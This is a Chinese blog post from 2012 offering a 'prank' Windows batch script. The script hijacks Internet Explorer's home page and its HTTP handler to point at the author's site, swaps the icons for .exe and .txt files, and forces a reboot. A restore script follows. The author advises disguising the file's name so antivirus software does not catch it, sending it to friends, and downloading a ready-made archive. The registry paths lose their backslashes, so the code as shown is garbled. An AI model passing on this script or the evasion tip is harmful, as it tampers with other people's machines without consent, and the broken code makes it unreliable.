A-A+

使用Windows 注册表和批处理的恶作剧

2012年08月09日 综合技术 评论 35 条 阅读 3,844 次

         一些无聊时的恶作剧,windows的注册表复杂又神秘,对于菜鸟来说又是不可进雷池一步,下面要说的就是通过修改注册表来达到的效果,然而我们并不是手工修改,而是通过windows的批处理功能,这样的话就达到了一些隐藏操作了。

        首先要说的是,windows的程序图标是可以修改的,通过注册表的修改,我们可以指定后缀名的图标。比如.txt文本文件有它的默认图标,可通过修改HKEY_CLASSES_ROOTtxtfileDefaultIcon 来修改成其他图标,然而这样的修改并没有破坏系统,仅仅改变样式而已,是windows的功能。

下面的代码修改了浏览器的主页为本站,当然是随便修改的了,修改exe和txt类型文件图标为%SystemRoot%1.ico的图标 ,这个图标是自己放进去的,%SystemRoot% 为windows目录。shutdown -r -f -t 0是重新启动的意思,完毕之后,exe和txt文件效果就是这样了图标

主页也被修改了,哈哈,其实这就是一些流氓插件的做法,特别是一些被修改了的Ghost系统。

就可以吓唬人去了。

可能你会有疑问,这怎么执行啊。方法就是做一个自解压文件就OK啦。

echo offcolor 45

@reg delete "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /f

@reg add "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.inewup.com" /f

@reg add "HKEY_USERs.DEFAULTSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.inewup.com" /f

@reg add "HKEY_USERsS-1-5-18SoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.inewup.com" /f

@reg add "HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand" /v "" /d "C:Program FilesInternet ExplorerIEXPLORE.EXE inewup.com" /f

@reg add "HKEY_CLASSES_ROOTHTTPshellopencommand" /v "" /d "C:Program FilesInternet ExplorerIEXPLORE.EXE inewup.com" /f

@reg add "HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand" /v "" /d "C:Program FilesInternet ExplorerIEXPLORE.EXE inewup.com" /f

@reg add "HKEY_CLASSES_ROOTexefileDefaultIcon" /v "" /d "%SystemRoot%1.ico" /f

@reg add "HKEY_CLASSES_ROOTtxtfileDefaultIcon" /v "" /d "%SystemRoot%1.ico" /f

echo off

shutdown -r -f -t 0

还原的道理是一样的,修改为默认值。

echo off

color 23

@reg delete "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /f

@reg add "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.baidu.com" /f

@reg add "HKEY_USERs.DEFAULTSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.baidu.com" /f

@reg add "HKEY_USERsS-1-5-18SoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.baidu.com" /f

@reg add "HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand" /v "" /d "C:Program FilesInternet ExplorerIEXPLORE.EXE www.baidu.com" /f

@reg add "HKEY_CLASSES_ROOTHTTPshellopencommand" /v "" /d "C:Program FilesInternet ExplorerIEXPLORE.EXE www.baidu.com" /f

@reg add "HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand" /v "" /d "C:Program FilesInternet ExplorerIEXPLORE.EXE www.baidu.com" /f

@reg add "HKEY_CLASSES_ROOTexefileDefaultIcon" /v "" /d "%1" /f

@reg add "HKEY_CLASSES_ROOTtxtfileDefaultIcon" /v "" /d "%SystemRoot%system32shell32.dll,-152" /f

echo off

del %SystemRoot%1.cmd /q

del %SystemRoot%1.ico /q

shutdown -r -f -t 0

已经做好的文件

 效果注册表

注意啦,使用时安全软件可能会拦截,毕竟他不是人类嘛,你可以把它的名字改为一些其他的,发给你的男朋友,女朋友,看看他们的表情。记得要修改回来哦啊。

文件下载地址:http://pan.baidu.com/netdisk/extractpublic?uk=2751525767

下载后可以使用WinRar打开,到时候自己修改吧。

给我留言